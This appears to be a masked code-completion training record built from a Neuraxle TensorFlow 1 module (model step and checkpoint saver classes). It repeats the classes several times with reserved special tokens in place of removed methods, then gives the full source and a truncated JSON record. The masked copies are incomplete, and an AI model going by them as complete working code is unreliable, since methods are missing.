self.is_initialized = True
def teardown(self) ->BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
        Strip tensorflow 1 properties from the step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
<|reserved_special_token_0|>
def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {self['data_inputs']: data_inputs}
if self.has_expected_outputs:
feed_dict.update({self['expected_outputs']: expected_outputs})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self,
data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']],
feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context,
step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.meta'.format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.index'.format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), '{0}.ckpt'.format(step.
get_name()))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TensorflowV1ModelStep(BaseTensorflowModelStep):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, create_graph, create_loss, create_optimizer,
create_feed_dict=None, data_inputs_dtype=None,
expected_outputs_dtype=None, variable_scope=None,
has_expected_outputs=True, print_loss=False, print_func=None):
BaseTensorflowModelStep.__init__(self, create_model=create_graph,
create_loss=create_loss, create_optimizer=create_optimizer,
create_inputs=create_feed_dict, data_inputs_dtype=
data_inputs_dtype, expected_outputs_dtype=
expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),
print_loss=print_loss, print_func=print_func)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) ->BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(
log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'],
name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) ->BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
        Strip tensorflow 1 properties from the step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.fit_model(data_inputs, expected_outputs)
def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {self['data_inputs']: data_inputs}
if self.has_expected_outputs:
feed_dict.update({self['expected_outputs']: expected_outputs})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self,
data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']],
feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
def transform_model(self, data_inputs):
"""
Transform tensorflow model using the variable scope.
:param data_inputs:
:return:
"""
inference_output_name = self._get_inference_output_name()
feed_dict = {self['data_inputs']: data_inputs}
results = self.session.run([self[inference_output_name], self[
'loss']], feed_dict=feed_dict)
self.add_new_loss(results[1], test_only=True)
return results[0]
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context,
step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.meta'.format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.index'.format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), '{0}.ckpt'.format(step.
get_name()))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TensorflowV1ModelStep(BaseTensorflowModelStep):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, create_graph, create_loss, create_optimizer,
create_feed_dict=None, data_inputs_dtype=None,
expected_outputs_dtype=None, variable_scope=None,
has_expected_outputs=True, print_loss=False, print_func=None):
BaseTensorflowModelStep.__init__(self, create_model=create_graph,
create_loss=create_loss, create_optimizer=create_optimizer,
create_inputs=create_feed_dict, data_inputs_dtype=
data_inputs_dtype, expected_outputs_dtype=
expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),
print_loss=print_loss, print_func=print_func)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) ->BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(
log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'],
name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) ->BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
        Strip tensorflow 1 properties from the step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.fit_model(data_inputs, expected_outputs)
def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {self['data_inputs']: data_inputs}
if self.has_expected_outputs:
feed_dict.update({self['expected_outputs']: expected_outputs})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self,
data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']],
feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
def transform_model(self, data_inputs):
"""
Transform tensorflow model using the variable scope.
:param data_inputs:
:return:
"""
inference_output_name = self._get_inference_output_name()
feed_dict = {self['data_inputs']: data_inputs}
results = self.session.run([self[inference_output_name], self[
'loss']], feed_dict=feed_dict)
self.add_new_loss(results[1], test_only=True)
return results[0]
def _get_inference_output_name(self):
"""
Return the output tensor name for inference (transform).
In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.
:return:
"""
inference_output_name = 'output'
if len(self['inference_output'].get_shape().as_list()) > 0:
inference_output_name = 'inference_output'
return inference_output_name
<|reserved_special_token_0|>
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context,
step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.meta'.format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.index'.format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), '{0}.ckpt'.format(step.
get_name()))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TensorflowV1ModelStep(BaseTensorflowModelStep):
"""
Base class for tensorflow 1 steps.
It uses :class:`TensorflowV1StepSaver` for saving the model.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/checkpoint>`_,
:class:`~neuraxle.base.BaseStep`
"""
HYPERPARAMS = HyperparameterSamples({})
HYPERPARAMS_SPACE = HyperparameterSpace({})
def __init__(self, create_graph, create_loss, create_optimizer,
create_feed_dict=None, data_inputs_dtype=None,
expected_outputs_dtype=None, variable_scope=None,
has_expected_outputs=True, print_loss=False, print_func=None):
BaseTensorflowModelStep.__init__(self, create_model=create_graph,
create_loss=create_loss, create_optimizer=create_optimizer,
create_inputs=create_feed_dict, data_inputs_dtype=
data_inputs_dtype, expected_outputs_dtype=
expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),
print_loss=print_loss, print_func=print_func)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) ->BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(
log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'],
name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) ->BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
        Strip tensorflow 1 properties from the step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.fit_model(data_inputs, expected_outputs)
def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {self['data_inputs']: data_inputs}
if self.has_expected_outputs:
feed_dict.update({self['expected_outputs']: expected_outputs})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self,
data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']],
feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
def transform_model(self, data_inputs):
"""
Transform tensorflow model using the variable scope.
:param data_inputs:
:return:
"""
inference_output_name = self._get_inference_output_name()
feed_dict = {self['data_inputs']: data_inputs}
results = self.session.run([self[inference_output_name], self[
'loss']], feed_dict=feed_dict)
self.add_new_loss(results[1], test_only=True)
return results[0]
def _get_inference_output_name(self):
"""
Return the output tensor name for inference (transform).
In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.
:return:
"""
inference_output_name = 'output'
if len(self['inference_output'].get_shape().as_list()) > 0:
inference_output_name = 'inference_output'
return inference_output_name
def __getitem__(self, item):
"""
Get a graph tensor by name using get item.
:param item: tensor name
:type item: str
:return: tensor
:rtype: tf.Tensor
"""
if ':' in item:
split = item.split(':')
tensor_name = split[0]
device = split[1]
else:
tensor_name = item
device = '0'
try:
result = self.graph.get_tensor_by_name('{0}/{1}:{2}'.format(
self.variable_scope, tensor_name, device))
except KeyError:
result = None
if result is None:
try:
result = self.graph.get_operation_by_name('{0}/{1}'.format(
self.variable_scope, tensor_name))
except KeyError:
result = tf.get_variable(tensor_name, [])
return result
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context,
step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.meta'.format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.index'.format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), '{0}.ckpt'.format(step.
get_name()))
<|reserved_special_token_1|>
"""
Neuraxle Tensorflow V1 Utility classes
=========================================
Neuraxle utility classes for tensorflow v1.
..
Copyright 2019, Neuraxio Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tensorflow as tf
from neuraxle.base import BaseSaver, BaseStep, ExecutionContext
from neuraxle.hyperparams.space import HyperparameterSamples, HyperparameterSpace
from neuraxle_tensorflow.tensorflow import BaseTensorflowModelStep
class TensorflowV1ModelStep(BaseTensorflowModelStep):
"""
Base class for tensorflow 1 steps.
It uses :class:`TensorflowV1StepSaver` for saving the model.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/checkpoint>`_,
:class:`~neuraxle.base.BaseStep`
"""
HYPERPARAMS = HyperparameterSamples({})
HYPERPARAMS_SPACE = HyperparameterSpace({})
def __init__(
self,
create_graph,
create_loss,
create_optimizer,
create_feed_dict=None,
data_inputs_dtype=None,
expected_outputs_dtype=None,
variable_scope=None,
has_expected_outputs=True,
print_loss=False,
print_func=None
):
BaseTensorflowModelStep.__init__(
self,
create_model=create_graph,
create_loss=create_loss,
create_optimizer=create_optimizer,
create_inputs=create_feed_dict,
data_inputs_dtype=data_inputs_dtype,
expected_outputs_dtype=expected_outputs_dtype,
step_saver=TensorflowV1StepSaver(),
print_loss=print_loss,
print_func=print_func
)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) -> BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
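        # Each step builds its own Graph: keeping variables isolated per step
        # lets several TensorflowV1ModelStep instances coexist in one pipeline.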
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'], name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) -> BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
Strip tensorflow 1 properties from to step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
def fit(self, data_inputs, expected_outputs=None) -> 'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.fit_model(data_inputs, expected_outputs)
def fit_model(self, data_inputs, expected_outputs=None) -> BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {
self['data_inputs']: data_inputs
}
if self.has_expected_outputs:
feed_dict.update({
self['expected_outputs']: expected_outputs
})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self, data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']], feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) -> 'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
def transform_model(self, data_inputs):
"""
Transform tensorflow model using the variable scope.
:param data_inputs:
:return:
"""
inference_output_name = self._get_inference_output_name()
feed_dict = {
self['data_inputs']: data_inputs
}
results = self.session.run([self[inference_output_name], self['loss']], feed_dict=feed_dict)
self.add_new_loss(results[1], test_only=True)
return results[0]
def _get_inference_output_name(self):
"""
Return the output tensor name for inference (transform).
In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.
:return:
"""
inference_output_name = 'output'
if len(self['inference_output'].get_shape().as_list()) > 0:
inference_output_name = 'inference_output'
return inference_output_name
def __getitem__(self, item):
"""
Get a graph tensor by name using get item.
:param item: tensor name
:type item: str
:return: tensor
:rtype: tf.Tensor
"""
if ":" in item:
split = item.split(":")
tensor_name = split[0]
device = split[1]
else:
tensor_name = item
device = "0"
try:
result = self.graph.get_tensor_by_name("{0}/{1}:{2}".format(self.variable_scope, tensor_name, device))
except KeyError:
result = None
if result is None:
try:
result = self.graph.get_operation_by_name("{0}/{1}".format(self.variable_scope, tensor_name))
except KeyError:
result = tf.get_variable(tensor_name, [])
return result
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext') -> 'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext') -> 'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context, step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(), "{0}.ckpt.meta".format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(), "{0}.ckpt.index".format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), "{0}.ckpt".format(step.get_name()))
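# Rough usage sketch (hypothetical builder callables, not part of this module).
# create_graph must name its placeholders 'data_inputs'/'expected_outputs' so
# that self['data_inputs'] can resolve them through the variable scope:
#
#     def create_graph(step, context):
#         x = tf.placeholder(tf.float32, [None, 2], name='data_inputs')
#         tf.placeholder(tf.float32, [None, 1], name='expected_outputs')
#         return tf.layers.dense(x, 1)
#
#     def create_loss(step):
#         return tf.reduce_mean(tf.square(step['output'] - step['expected_outputs']))
#
#     def create_optimizer(step, context):
#         return tf.train.AdamOptimizer(1e-3)
#
#     step = TensorflowV1ModelStep(create_graph, create_loss, create_optimizer)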
|
flexible
|
{
"blob_id": "76a22408bb423d9a5bc5bc007decdbc7c6cc98f7",
"index": 8397,
"step-1": "<mask token>\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, create_graph, create_loss, create_optimizer,\n create_feed_dict=None, data_inputs_dtype=None,\n expected_outputs_dtype=None, variable_scope=None,\n has_expected_outputs=True, print_loss=False, print_func=None):\n BaseTensorflowModelStep.__init__(self, create_model=create_graph,\n create_loss=create_loss, create_optimizer=create_optimizer,\n create_inputs=create_feed_dict, data_inputs_dtype=\n data_inputs_dtype, expected_outputs_dtype=\n expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss, print_func=print_func)\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) ->BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(\n log_device_placement=True), graph=self.graph)\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'],\n name='optimizer')\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) ->BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n return self\n <mask token>\n\n def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {self['data_inputs']: data_inputs}\n if self.has_expected_outputs:\n feed_dict.update({self['expected_outputs']: expected_outputs})\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self,\n data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n results = self.session.run([self['optimizer'], self['loss']],\n feed_dict=feed_dict)\n loss = results[1]\n self.add_new_loss(loss)\n return self\n\n def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. 
